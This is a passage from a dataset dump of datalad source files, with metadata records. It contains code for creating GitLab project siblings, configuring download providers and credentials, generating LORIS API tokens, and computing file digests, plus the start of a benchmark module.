'error' else 'notneeded',\n message=('already has a configured sibling \"%s\"', remotename),\n )\n return\n\n if layout is None:\n # figure out the layout of projects on the site\n # use the reference dataset as default, and fall back\n # on 'collection' as the most generic method of representing\n # the filesystem in a group/subproject structure\n layout_var = 'datalad.gitlab-{}-layout'.format(site)\n layout = ds.config.get(\n layout_var, refds.config.get(\n layout_var, 'collection'))\n if layout not in known_layout_labels:\n raise ValueError(\n \"Unknown site layout '{}' given or configured, \"\n \"known ones are: {}\".format(layout, known_layout_labels))\n\n if access is None:\n access_var = 'datalad.gitlab-{}-access'.format(site)\n access = ds.config.get(\n access_var, refds.config.get(\n access_var, 'http'))\n if access not in known_access_labels:\n raise ValueError(\n \"Unknown site access '{}' given or configured, \"\n \"known ones are: {}\".format(access, known_access_labels))\n\n pathsep = ds.config.get(\"datalad.gitlab-default-pathseparator\", \"-\")\n project_stub = \\\n ds.config.get(\"datalad.gitlab-default-projectname\", \"project\")\n project_var = 'datalad.gitlab-{}-project'.format(site)\n process_root = refds == ds\n if project is None:\n # look for a specific config in the dataset\n project = ds.config.get(project_var, None)\n\n if project and process_root and layout != 'flat':\n # the root of a collection\n project = f'{project}/{project_stub}'\n elif project is None and not process_root:\n # check if we can build one from the refds config\n ref_project = refds.config.get(project_var, None)\n if ref_project:\n # layout-specific derivation of a path from\n # the reference dataset configuration\n rproject = ds.pathobj.relative_to(refds.pathobj).as_posix()\n if layout == 'collection':\n project = '{}/{}'.format(\n ref_project,\n rproject.replace('/', pathsep))\n else:\n project = '{}{}{}'.format(\n ref_project,\n pathsep,\n rproject.replace('/', pathsep))\n\n if project is None:\n yield dict(\n res_kwargs,\n status='error',\n message='No project name/location specified, and no configuration '\n 'to derive one',\n )\n return\n\n res_kwargs['project'] = project\n\n if dry_run:\n # this is as far as we can get without talking to GitLab\n yield dict(\n res_kwargs,\n status='ok',\n dryrun=True,\n )\n return\n\n # and now talk to GitLab for real\n site_api = siteobjs[site] if site in siteobjs else GitLabSite(site)\n\n site_project = site_api.get_project(project)\n if site_project is None:\n try:\n site_project = site_api.create_project(project, description)\n # report success\n message = \"sibling repository '%s' created at %s\",\\\n remotename, site_project.get('web_url', None)\n yield dict(\n res_kwargs,\n # relay all attributes\n project_attributes=site_project,\n message=message,\n status='ok',\n )\n except Exception as e:\n ce = CapturedException(e)\n yield dict(\n res_kwargs,\n # relay all attributes\n status='error',\n message=('Failed to create GitLab project: %s', ce),\n exception=ce\n )\n return\n else:\n # there already is a project\n if existing == 'error':\n # be nice and only actually error if there is a real mismatch\n if remotename not in dremotes:\n yield dict(\n res_kwargs,\n project_attributes=site_project,\n status='error',\n message=(\n \"There is already a project at '%s' on site '%s', \"\n \"but no sibling with name '%s' is configured, \"\n \"maybe use --existing=reconfigure\",\n project, site, remotename,\n )\n )\n return\n elif access in ('ssh', 'ssh+http') \\\n and dremotes[remotename].get(\n 'url', None) != site_project.get(\n # use False as a default so that there is a\n # mismatch, complain if both are missing\n 'ssh_url_to_repo', False):\n yield dict(\n res_kwargs,\n project_attributes=site_project,\n status='error',\n message=(\n \"There is already a project at '%s' on site '%s', \"\n \"but SSH access URL '%s' does not match '%s', \"\n \"maybe use --existing=reconfigure\",\n project, site,\n dremotes[remotename].get('url', None),\n site_project.get('ssh_url_to_repo', None)\n )\n )\n return\n elif access == 'http' \\\n and dremotes[remotename].get(\n 'url', None) != site_project.get(\n # use False as a default so that there is a\n # mismatch, veen if both are missing\n 'http_url_to_repo', False):\n yield dict(\n res_kwargs,\n project_attributes=site_project,\n status='error',\n message=(\n \"There is already a project at '%s' on site '%s', \"\n \"but HTTP access URL '%s' does not match '%s', \"\n \"maybe use --existing=reconfigure\",\n project, site,\n dremotes[remotename].get('url', None),\n site_project.get('http_url_to_repo', None)\n )\n )\n return\n yield dict(\n res_kwargs,\n project_attributes=site_project,\n status='notneeded',\n message=(\n \"There is already a project at '%s' on site '%s'\",\n project, site,\n )\n )\n\n # first make sure that annex doesn't touch this one\n # but respect any existing config\n ignore_var = 'remote.{}.annex-ignore'.format(remotename)\n if ignore_var not in ds.config:\n ds.config.add(ignore_var, 'true', scope='local')\n\n for res in ds.siblings(\n 'configure',\n name=remotename,\n url=site_project['http_url_to_repo']\n if access in ('http', 'ssh+http')\n else site_project['ssh_url_to_repo'],\n pushurl=site_project['ssh_url_to_repo']\n if access in ('ssh', 'ssh+http')\n else None,\n recursive=False,\n publish_depends=depends,\n result_renderer='disabled',\n return_type='generator'):\n yield res\n\n\nclass GitLabSite(object):\n def __init__(self, site):\n import gitlab\n self.gitlab = gitlab\n try:\n self.site = gitlab.Gitlab.from_config(site)\n except gitlab.config.GitlabDataError as e:\n raise ValueError(\n '{}, please configure access to this GitLab instance'.format(\n str(e)))\n\n def get_project(self, path):\n try:\n return self.site.projects.get(path).attributes\n except self.gitlab.GitlabGetError as e:\n lgr.debug(\"Project with path '%s' does not yet exist at site '%s'\",\n path, self.site.url)\n return None\n\n def create_project(self, path, description=None):\n path_l = path.split('/')\n namespace_id = self._obtain_namespace(path_l)\n # check for options:\n # https://gitlab.com/help/api/projects.md#create-project\n props = dict(\n name=path_l[-1],\n namespace_id=namespace_id,\n )\n if description:\n props['description'] = description\n project = self.site.projects.create(props)\n return project.attributes\n\n def _obtain_namespace(self, path_l):\n\n if len(path_l) == 1:\n # no nesting whatsoever\n return None\n\n try:\n namespace_id = self.site.groups.get(\n '/'.join(path_l[:-1])).get_id()\n lgr.debug(\"Found existing parent group '%s' with ID %s\",\n '/'.join(path_l[:-1]), namespace_id)\n except self.gitlab.GitlabGetError as e:\n try:\n if len(path_l) > 2:\n parent_group = self.site.groups.get(\n '/'.join(path_l[:-2]))\n else:\n parent_group = None\n except self.gitlab.GitlabGetError as e:\n raise ValueError(\n \"No parent group {} for project {} found, \"\n \"and a group {} also does not exist. At most one \"\n \"parent group would be created.\".format(\n '/'.join(path_l[:-1]),\n '/'.join(path_l),\n '/'.join(path_l[:-2]),\n ))\n # create the group for the target project\n try:\n # prevent failure due to specification of a users personal\n # group, always exists, cannot and must not be created\n self.site.auth()\n if len(path_l) == 2 \\\n and path_l[0] == self.site.user.attributes.get(\n 'username', None):\n # attempt to create a personal project in the users\n # top-level personal group-- this is the same as\n # having no parent namespace, don't attempt to\n # create the group\n return None\n namespace_id = self.site.groups.create(dict(\n name=path_l[-2],\n path=path_l[-2],\n parent_id=parent_group.get_id() if parent_group else None)\n ).get_id()\n except self.gitlab.GitlabCreateError as e:\n raise RuntimeError(\n \"Failed to create parent group '{}' under {}: {}\".format(\n path_l[-2],\n repr(parent_group.attributes['full_path'])\n if parent_group else 'the account root',\n str(e)),\n )\n return namespace_id\n" }, { "alpha_fraction": 0.585260272026062, "alphanum_fraction": 0.586125910282135, "avg_line_length": 38.83743667602539, "blob_id": "571b25cf609407b6655cf6a21c1d832302d4114e", "content_id": "42aa355a6f76a3193f52d76d4ee3f29f5024769e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 24261, "license_type": "permissive", "max_line_length": 121, "num_lines": 609, "path": "/datalad/downloaders/providers.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Data providers - bind downloaders and credentials together\n\"\"\"\n\nfrom glob import glob\nfrom logging import getLogger\n\nimport re\nfrom os.path import dirname, abspath, join as pathjoin\nfrom urllib.parse import urlparse\n\nfrom .base import NoneAuthenticator, NotImplementedAuthenticator\n\nfrom .http import (\n HTMLFormAuthenticator,\n HTTPAnonBearerTokenAuthenticator,\n HTTPAuthAuthenticator,\n HTTPBasicAuthAuthenticator,\n HTTPDigestAuthAuthenticator,\n HTTPBearerTokenAuthenticator,\n HTTPDownloader,\n)\nfrom .s3 import S3Authenticator, S3Downloader\nfrom .shub import SHubDownloader\nfrom configparser import ConfigParser as SafeConfigParserWithIncludes\nfrom datalad.support.external_versions import external_versions\nfrom datalad.support.network import RI\nfrom datalad.support import path\nfrom datalad.utils import (\n auto_repr,\n ensure_list_from_str,\n get_dataset_root,\n Path,\n)\n\nfrom ..interface.common_cfg import dirs\n\nlgr = getLogger('datalad.downloaders.providers')\n\n# dict to bind authentication_type's to authenticator classes\n# parameters will be fetched from config file itself\nAUTHENTICATION_TYPES = {\n 'html_form': HTMLFormAuthenticator,\n 'http_auth': HTTPAuthAuthenticator,\n 'http_basic_auth': HTTPBasicAuthAuthenticator,\n 'http_digest_auth': HTTPDigestAuthAuthenticator,\n 'bearer_token': HTTPBearerTokenAuthenticator,\n 'bearer_token_anon': HTTPAnonBearerTokenAuthenticator,\n 'aws-s3': S3Authenticator, # TODO: check if having '-' is kosher\n 'nda-s3': S3Authenticator,\n 'loris-token': HTTPBearerTokenAuthenticator,\n 'xnat': NotImplementedAuthenticator,\n 'none': NoneAuthenticator,\n}\n\nfrom datalad.downloaders import CREDENTIAL_TYPES\n\n\n@auto_repr\nclass Provider(object):\n \"\"\"Class to bring together url_res, credential, and authenticator\n \"\"\"\n # TODO: we might need a lazy loading of the submodules which would provide\n # specific downloaders while importing needed Python modules \"on demand\"\n DOWNLOADERS = {\n 'http': {'class': HTTPDownloader, 'externals': {'requests'}},\n 'https': {'class': HTTPDownloader, 'externals': {'requests'}},\n 'shub': {'class': SHubDownloader, 'externals': {'requests'}},\n 'ftp': {'class': HTTPDownloader, 'externals': {'requests', 'boto'}},\n 's3': {'class': S3Downloader, 'externals': {'boto'}}\n # ... TODO\n }\n\n def __init__(self, name, url_res, credential=None, authenticator=None,\n downloader=None):\n \"\"\"\n Parameters\n ----------\n name: str\n url_res: list of str\n Regular expressions\n credential: Credential, optional\n authenticator: Authenticator, optional\n downloader: Downloader, optional\n\n \"\"\"\n self.name = name\n self.url_res = ensure_list_from_str(url_res)\n self.credential = credential\n self.authenticator = authenticator\n self._downloader = downloader\n\n @property\n def downloader(self):\n return self._downloader\n\n @staticmethod\n def get_scheme_from_url(url):\n \"\"\"Given a URL return scheme to decide which downloader class to use\n \"\"\"\n url_split = urlparse(url)\n return url_split.scheme # , url_split.netloc)\n\n @classmethod\n def _get_downloader_class(cls, url):\n key = cls.get_scheme_from_url(url)\n if key in cls.DOWNLOADERS:\n entry = cls.DOWNLOADERS[key]\n klass = entry['class']\n for ext in entry.get('externals', set()):\n if external_versions[ext] is None:\n raise RuntimeError(\n \"For using %s downloader, you need '%s' dependency \"\n \"which seems to be missing\" % (klass, ext)\n )\n return klass\n else:\n raise ValueError(\"Do not know how to handle url %s for scheme %s. Known: %s\"\n % (url, key, cls.DOWNLOADERS.keys()))\n\n def get_downloader(self, url, **kwargs):\n \"\"\"Assigns proper downloader given the URL\n\n If one is known -- verifies its appropriateness for the given url.\n ATM we do not support multiple types of downloaders per single provider\n \"\"\"\n if self._downloader is None:\n # we need to create a new one\n Downloader = self._get_downloader_class(url)\n # we might need to provide it with credentials and authenticator\n # Let's do via kwargs so we could accommodate cases when downloader does not necessarily\n # cares about those... duck typing or what it is in action\n kwargs = kwargs.copy()\n if self.credential:\n kwargs['credential'] = self.credential\n if self.authenticator:\n kwargs['authenticator'] = self.authenticator\n self._downloader = Downloader(**kwargs)\n return self._downloader\n\n\nclass Providers(object):\n \"\"\"\n\n So we could provide handling for URLs with corresponding credentials\n and specific (reusable) downloader. Internally it contains\n Providers and interfaces them based on a given URL. Each provider\n in turn takes care about associated with it Downloader.\n \"\"\"\n\n _DEFAULT_PROVIDERS = None\n _DS_ROOT = None\n _CONFIG_TEMPLATE = \"\"\"\\\n# Provider configuration file created to initially access\n# {url}\n\n[provider:{name}]\nurl_re = {url_re}\nauthentication_type = {authentication_type}\n# Note that you might need to specify additional fields specific to the\n# authenticator. Fow now \"look into the docs/source\" of {authenticator_class}\n# {authentication_type}_\ncredential = {credential_name}\n\n[credential:{credential_name}]\n# If known, specify URL or email to how/where to request credentials\n# url = ???\ntype = {credential_type}\n\"\"\"\n\n def __init__(self, providers=None):\n \"\"\"\n \"\"\"\n self._providers = providers or []\n # a set of providers to handle connections without authentication.\n # Will be setup one per each protocol schema\n self._default_providers = {}\n\n def __repr__(self):\n return \"%s(%s)\" % (\n self.__class__.__name__,\n \"\" if not self._providers else repr(self._providers)\n )\n\n def __len__(self):\n return len(self._providers)\n\n def __getitem__(self, index):\n return self._providers[index]\n\n def __iter__(self):\n return self._providers.__iter__()\n\n @classmethod\n def _get_providers_dirs(cls, dsroot=None):\n \"\"\"Return an ordered dict with directories to look for provider config files\n\n Is implemented as a function to ease mock testing depending on dirs.\n values\n \"\"\"\n paths = dict()\n paths['dist'] = pathjoin(dirname(abspath(__file__)), 'configs')\n if dsroot is not None:\n paths['ds'] = pathjoin(dsroot, '.datalad', 'providers')\n paths['site'] = pathjoin(dirs.site_config_dir, \"providers\") \\\n if dirs.site_config_dir else None\n paths['user'] = pathjoin(dirs.user_config_dir, \"providers\") \\\n if dirs.user_config_dir else None\n return paths\n\n @classmethod\n def _get_configs(cls, dir, files='*.cfg'):\n return glob(pathjoin(dir, files)) if dir is not None else []\n\n @classmethod\n def from_config_files(cls, files=None, reload=False):\n \"\"\"Loads information about related/possible websites requiring authentication from:\n\n - datalad/downloaders/configs/*.cfg files provided by the codebase\n - current dataset .datalad/providers/\n - User's home directory directory (ie ~/.config/datalad/providers/*.cfg)\n - system-wide datalad installation/config (ie /etc/datalad/providers/*.cfg)\n\n For sample configs files see datalad/downloaders/configs/providers.cfg\n\n If files is None, loading is cached between calls. Specify reload=True to force\n reloading of files from the filesystem. The class method reset_default_providers\n can also be called to reset the cached providers.\n \"\"\"\n # lazy part\n # Note, that \"\" is effectively the same as \".\". If CWD is in a dataset's\n # root already, `get_dataset_root` will just return its input. While\n # this is technically correct, we want to use it here in order to\n # figure, whether the dsroot is the same as when we called last time.\n # However, \"\", \".\", etc. would stay the same, whenever we switch into\n # another dataset, causing `from_config_files` to \"think\" nothing\n # changed. Therefore use abspath here.\n dsroot_rel = get_dataset_root(\"\")\n dsroot = abspath(dsroot_rel) if dsroot_rel is not None else None\n if files is None and cls._DEFAULT_PROVIDERS and not reload and dsroot==cls._DS_ROOT:\n return cls._DEFAULT_PROVIDERS\n\n config = SafeConfigParserWithIncludes()\n files_orig = files\n if files is None:\n cls._DS_ROOT = dsroot\n files = []\n for p in cls._get_providers_dirs(dsroot).values():\n files.extend(cls._get_configs(p))\n config.read(files)\n\n # We need first to load Providers and credentials\n # Order matters, because we need to ensure that when\n # there's a conflict between configuration files declared\n # at different precedence levels (ie. dataset vs system)\n # the appropriate precedence config wins.\n providers = dict()\n credentials = {}\n\n for section in config.sections():\n if ':' in section:\n type_, name = section.split(':', 1)\n assert type_ in {'provider', 'credential'}, \"we know only providers and credentials, got type %s\" % type_\n items = {\n o: config.get(section, o) for o in config.options(section)\n }\n # side-effect -- items get popped\n locals().get(type_ + \"s\")[name] = getattr(\n cls, '_process_' + type_)(name, items)\n if len(items):\n raise ValueError(\"Unprocessed fields left for %s: %s\" % (name, str(items)))\n else:\n lgr.warning(\"Do not know how to treat section %s here\" % section)\n\n # link credentials into providers\n lgr.debug(\"Assigning credentials into %d providers\", len(providers))\n for provider in providers.values():\n if provider.credential:\n if provider.credential not in credentials:\n raise ValueError(\"Unknown credential %s. Known are: %s\"\n % (provider.credential, \", \".join(credentials.keys())))\n provider.credential = credentials[provider.credential]\n # TODO: Is this the right place to pass dataset to credential?\n provider.credential.set_context(dataset=cls._DS_ROOT)\n\n providers = Providers(list(providers.values()))\n\n if files_orig is None:\n # Store providers for lazy access\n cls._DEFAULT_PROVIDERS = providers\n\n return providers\n\n @classmethod\n def reset_default_providers(cls):\n \"\"\"Resets to None memoized by from_config_files providers\n \"\"\"\n cls._DEFAULT_PROVIDERS = None\n\n @classmethod\n def _process_provider(cls, name, items):\n \"\"\"Process a dictionary specifying the provider and output the Provider instance\n \"\"\"\n assert 'authentication_type' in items, \"Must have authentication_type specified\"\n\n auth_type = items.pop('authentication_type')\n if auth_type not in AUTHENTICATION_TYPES:\n raise ValueError(\"Unknown authentication_type=%s. Known are: %s\"\n % (auth_type, ', '.join(AUTHENTICATION_TYPES)))\n\n if auth_type != 'none':\n authenticator = AUTHENTICATION_TYPES[auth_type](\n # Extract all the fields as keyword arguments\n **{k[len(auth_type) + 1:]: items.pop(k)\n for k in list(items.keys())\n if k.startswith(auth_type + \"_\")}\n )\n else:\n authenticator = None\n\n # bringing url_re to \"standard\" format of a list and populating _providers_ordered\n url_res = ensure_list_from_str(items.pop('url_re', []))\n assert url_res, \"current implementation relies on having url_re defined\"\n\n credential = items.pop('credential', None)\n\n # credential instance will be assigned later after all of them are loaded\n return Provider(name=name, url_res=url_res, authenticator=authenticator,\n credential=credential)\n\n @classmethod\n def _process_credential(cls, name, items):\n assert 'type' in items, \"Credential must specify type. Missing in %s\" % name\n cred_type = items.pop('type')\n if cred_type not in CREDENTIAL_TYPES:\n raise ValueError(\"I do not know type %s credential. Known: %s\"\n % (cred_type, CREDENTIAL_TYPES.keys()))\n return CREDENTIAL_TYPES[cred_type](name=name, url=items.pop('url', None))\n\n def reload(self):\n new_providers = self.from_config_files(reload=True)\n self._providers = new_providers._providers\n self._default_providers = new_providers._default_providers\n\n def get_provider(self, url, only_nondefault=False, return_all=False):\n \"\"\"Given a URL returns matching provider\n \"\"\"\n\n # Range backwards to ensure that more locally defined\n # configuration wins in conflicts between url_re\n matching_providers = []\n for provider in self._providers[::-1]:\n for url_re in provider.url_res:\n try:\n if re.match(url_re, url):\n lgr.debug(\"Returning provider %s for url %s\", provider, url)\n matching_providers.append(provider)\n except re.error:\n lgr.warning(\n \"Invalid regex %s in provider %s\"\n % (url_re, provider.name)\n )\n\n if matching_providers:\n if return_all:\n return matching_providers\n if len(matching_providers) > 1:\n lgr.warning(\n \"Multiple providers matched for %s, using the first one\"\n % url)\n return matching_providers[0]\n\n if only_nondefault:\n return None\n\n # None matched -- so we should get a default one per each of used\n # protocols\n scheme = Provider.get_scheme_from_url(url)\n if scheme not in self._default_providers:\n lgr.debug(\"Initializing default provider for %s\", scheme)\n self._default_providers[scheme] = Provider(name=\"\", url_res=[\"%s://.*\" % scheme])\n provider = self._default_providers[scheme]\n lgr.debug(\"No dedicated provider, returning default one for %s: %s\",\n scheme, provider)\n return provider\n\n def _store_new(self, url=None, authentication_type=None,\n authenticator_class=None, url_re=None, name=None,\n credential_name=None, credential_type=None, level='user'):\n \"\"\"Stores a provider and credential config and reloads afterwards.\n\n Note\n ----\n non-interactive version of `enter_new`.\n For now non-public, pending further refactoring\n\n Parameters\n ----------\n level: str\n Where to store the config. Choices: 'user' (default), 'ds', 'site'\n\n Returns\n -------\n Provider\n The stored `Provider` as reported by reload\n \"\"\"\n\n # We don't ask user for confirmation, so for this non-interactive\n # routine require everything to be explicitly specified.\n if any(not a for a in [url, authentication_type, authenticator_class,\n url_re, name, credential_name, credential_type]):\n raise ValueError(\"All arguments must be specified\")\n\n if level not in ['user', 'ds', 'site']:\n raise ValueError(\"'level' must be one of 'user', 'ds', 'site'\")\n\n providers_dir = Path(self._get_providers_dirs()[level])\n if not providers_dir.exists():\n providers_dir.mkdir(parents=True, exist_ok=True)\n filepath = providers_dir / f\"{name}.cfg\"\n cfg = self._CONFIG_TEMPLATE.format(**locals())\n filepath.write_bytes(cfg.encode('utf-8'))\n self.reload()\n return self.get_provider(url)\n\n def enter_new(self, url=None, auth_types=[], url_re=None, name=None,\n credential_name=None, credential_type=None):\n # TODO: level/location!\n \"\"\"Create new provider and credential config\n\n If interactive, this will ask the user to enter the details (or confirm\n default choices). A dedicated config file is written at\n <user_config_dir>/providers/<name>.cfg\n\n Parameters:\n -----------\n url: str or RI\n URL this config is created for\n auth_types: list\n List of authentication types to choose from. First entry becomes\n default. See datalad.downloaders.providers.AUTHENTICATION_TYPES\n url_re: str\n regular expression; Once created, this config will be used for any\n matching URL; defaults to `url`\n name: str\n name for the provider; needs to be unique per user\n credential_name: str\n name for the credential; defaults to the provider's name\n credential_type: str\n credential type to use (key for datalad.downloaders.CREDENTIAL_TYPES)\n \"\"\"\n\n from datalad.ui import ui\n if url and not name:\n ri = RI(url)\n for f in ('hostname', 'name'):\n try:\n # might need sanitarization\n name = str(getattr(ri, f))\n except AttributeError:\n pass\n known_providers_by_name = {p.name: p for p in self._providers}\n providers_user_dir = self._get_providers_dirs()['user']\n while True:\n name = ui.question(\n title=\"New provider name\",\n text=\"Unique name to identify 'provider' for %s\" % url,\n default=name\n )\n filename = pathjoin(providers_user_dir, '%s.cfg' % name)\n if name in known_providers_by_name:\n if ui.yesno(\n title=\"Known provider %s\" % name,\n text=\"Provider with name %s already known. Do you want to \"\n \"use it for this session?\"\n % name,\n default=True\n ):\n return known_providers_by_name[name]\n elif path.lexists(filename):\n ui.error(\n \"File %s already exists, choose another name\" % filename)\n else:\n break\n\n if not credential_name:\n credential_name = name\n if not url_re:\n url_re = re.escape(url) if url else None\n while True:\n url_re = ui.question(\n title=\"New provider regular expression\",\n text=\"A (Python) regular expression to specify for which URLs \"\n \"this provider should be used\",\n default=url_re\n )\n if not re.match(url_re, url):\n ui.error(\"Provided regular expression doesn't match original \"\n \"url. Please re-enter\")\n # TODO: url_re of another provider might match it as well\n # I am not sure if we have any kind of \"priority\" setting ATM\n # to differentiate or to to try multiple types :-/\n else:\n break\n\n authentication_type = None\n if auth_types:\n auth_types = [\n t for t in auth_types if t in AUTHENTICATION_TYPES\n ]\n if auth_types:\n authentication_type = auth_types[0]\n\n # Setup credential\n authentication_type = ui.question(\n title=\"Authentication type\",\n text=\"What authentication type to use\",\n default=authentication_type,\n choices=sorted(AUTHENTICATION_TYPES)\n )\n authenticator_class = AUTHENTICATION_TYPES[authentication_type]\n\n # TODO: need to figure out what fields that authenticator might\n # need to have setup and ask for them here!\n\n credential_type = ui.question(\n title=\"Credential\",\n text=\"What type of credential should be used?\",\n choices=sorted(CREDENTIAL_TYPES),\n default=credential_type or getattr(authenticator_class,\n 'DEFAULT_CREDENTIAL_TYPE')\n )\n\n cfg = self._CONFIG_TEMPLATE.format(**locals())\n if ui.yesno(\n title=\"Save provider configuration file\",\n text=\"Following configuration will be written to %s:\\n%s\"\n % (filename, cfg),\n default='yes'\n ):\n # Just create a configuration file and reload the thing\n return self._store_new(url=url,\n authentication_type=authentication_type,\n authenticator_class=authenticator_class,\n url_re=url_re,\n name=name,\n credential_name=credential_name,\n credential_type=credential_type,\n level='user'\n )\n else:\n return None\n\n\n # TODO: avoid duplication somehow ;)\n # Sugarings to get easier access to downloaders\n def download(self, url, *args, **kwargs):\n return self.get_provider(url).get_downloader(url).download(url, *args, **kwargs)\n\n def fetch(self, url, *args, **kwargs):\n return self.get_provider(url).get_downloader(url).fetch(url, *args, **kwargs)\n\n def get_status(self, url, *args, **kwargs):\n return self.get_provider(url).get_downloader(url).get_status(url, *args, **kwargs)\n\n def needs_authentication(self, url):\n provider = self.get_provider(url, only_nondefault=True)\n if provider is None:\n return None\n return provider.authenticator is not None\n\n\n # # TODO: UNUSED?\n # def get_credentials(self, url, new=False):\n # \"\"\"Ask user to enter credentials for a provider matching url\n # \"\"\"\n # # find a match among _items\n # provider = self.get_provider(url)\n # if new or not provider:\n # rec = self._get_new_record_ui(url)\n # rec['url_re'] = \"TODO\" # present to user and ask to edit\n # name = urlparse(url).netloc\n # self._items[name] = rec\n # if ui.yesno(\"Do you want to store credentials for %s\" % name):\n # self.store_credentials()\n # else:\n # return self._items[name]\n #\n # def store_credentials(self, name):\n # # TODO: store self._items[name] in appropriate (user) creds\n # # for later reuse\n # raise NotImplementedError()\n #\n # def _get_new_record_ui(self, url):\n # # TODO: should be a dialog with the fields appropriate for this particular\n # # type of credentials\n # ui.message(\"To access %s we would need credentials.\" % url)\n # if url in self.providers:\n # ui.message(\"If you don't yet have credentials, please visit %s\"\n # % self.providers.get(url, 'credentials_url'))\n # return { 'user': ui.question(\"Username:\"),\n # 'password': ui.password() }\n" }, { "alpha_fraction": 0.5808873772621155, "alphanum_fraction": 0.5849829316139221, "avg_line_length": 28.280000686645508, "blob_id": "8b3f787fb9f2cf34dfcdf8d29f9badb1366101c2", "content_id": "3118f5b8611103fa0991a54a76ea4dca71b50e37", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 1465, "license_type": "permissive", "max_line_length": 87, "num_lines": 50, "path": "/datalad/support/third/loris_token_generator.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### #\nimport sys\nimport json\n\nfrom urllib.request import (\n Request,\n urlopen,\n)\nfrom urllib.error import HTTPError\n\nfrom datalad.support.exceptions import (\n AccessDeniedError,\n)\nfrom datalad.utils import ensure_unicode\n\n\nclass LORISTokenGenerator(object):\n \"\"\"\n Generate a LORIS API token by making a request to the\n LORIS login API endpoint with the given username\n and password.\n\n url is the complete URL of the $LORIS/api/$VERSION/login\n endpoint.\n \"\"\"\n def __init__(self, url=None):\n assert(url is not None)\n self.url = url\n\n def generate_token(self, user=None, password=None):\n data = {'username': user, 'password' : password}\n encoded_data = json.dumps(data).encode('utf-8')\n\n request = Request(self.url, encoded_data)\n\n try:\n response = urlopen(request)\n except HTTPError:\n raise AccessDeniedError(\"Could not authenticate into LORIS\")\n\n str_response = ensure_unicode(response.read())\n data = json.loads(str_response)\n return data[\"token\"]\n\n" }, { "alpha_fraction": 0.5440565347671509, "alphanum_fraction": 0.5635910034179688, "avg_line_length": 31.079999923706055, "blob_id": "3a63d083e39e2b516915d2d4bb7499d9e92a64fc", "content_id": "db6a85c4101a9945d4977996114a9bf077a3223e", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2406, "license_type": "permissive", "max_line_length": 94, "num_lines": 75, "path": "/datalad/support/digests.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# emacs: -*- mode: python; py-indent-offset: 4; tab-width: 4; indent-tabs-mode: nil -*-\n# ex: set sts=4 ts=4 sw=4 et:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Provides helper to compute digests (md5 etc) on files\n\"\"\"\n\nfrom __future__ import annotations\n\nimport hashlib\nimport logging\nfrom pathlib import Path\nfrom typing import Optional\n\nfrom ..utils import auto_repr\n\nlgr = logging.getLogger('datalad.support.digests')\n\n\n@auto_repr\nclass Digester:\n \"\"\"Helper to compute multiple digests in one pass for a file\n \"\"\"\n\n # Loosely based on snippet by PM 2Ring 2014.10.23\n # http://unix.stackexchange.com/a/163769/55543\n\n # Ideally we should find an efficient way to parallelize this but\n # atm this one is sufficiently speedy\n\n DEFAULT_DIGESTS = ['md5', 'sha1', 'sha256', 'sha512']\n\n def __init__(self, digests: Optional[list[str]] = None, blocksize: int = 1 << 16) -> None:\n \"\"\"\n Parameters\n ----------\n digests : list or None\n List of any supported algorithm labels, such as md5, sha1, etc.\n If None, a default set of hashes will be computed (md5, sha1,\n sha256, sha512).\n blocksize : int\n Chunk size (in bytes) by which to consume a file.\n \"\"\"\n self._digests = digests or self.DEFAULT_DIGESTS\n self._digest_funcs = [getattr(hashlib, digest) for digest in self._digests]\n self.blocksize = blocksize\n\n @property\n def digests(self) -> list[str]:\n return self._digests\n\n def __call__(self, fpath: str | Path) -> dict[str, str]:\n \"\"\"\n fpath : str\n File path for which a checksum shall be computed.\n\n Return\n ------\n dict\n Keys are algorithm labels, and values are checksum strings\n \"\"\"\n lgr.debug(\"Estimating digests for %s\", fpath)\n digests = [x() for x in self._digest_funcs]\n with open(fpath, 'rb') as f:\n while True:\n block = f.read(self.blocksize)\n if not block:\n break\n [d.update(block) for d in digests]\n\n return {n: d.hexdigest() for n, d in zip(self.digests, digests)}\n" }, { "alpha_fraction": 0.5815602540969849, "alphanum_fraction": 0.585106372833252, "avg_line_length": 35.78260803222656, "blob_id": "eb15ffb4a37be9d872e40543fbb55630d3c99243", "content_id": "32affff4fc2fcb178da8fee1eefcd41c45f1af63", "detected_licenses": [ "BSD-3-Clause", "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 846, "license_type": "permissive", "max_line_length": 83, "num_lines": 23, "path": "/benchmarks/repo.py", "repo_name": "datalad/datalad", "src_encoding": "UTF-8", "text": "# ex: set sts=4 ts=4 sw=4 noet:\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n#\n# See COPYING file distributed along with the datalad package for the\n# copyright and license terms.\n#\n# ## ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ### ##\n\"\"\"Benchmarks of the basic repos (Git/Annex) functionality\"\"\"\n\nfrom .common import (\n SampleSuperDatasetBenchmarks,\n SuprocBenchmarks,\n)\n\n\n# TODO: probably SampleSuperDatasetBenchmarks is not the best for these benchmarks\n# but we are yet to make it parametric so we could sweep 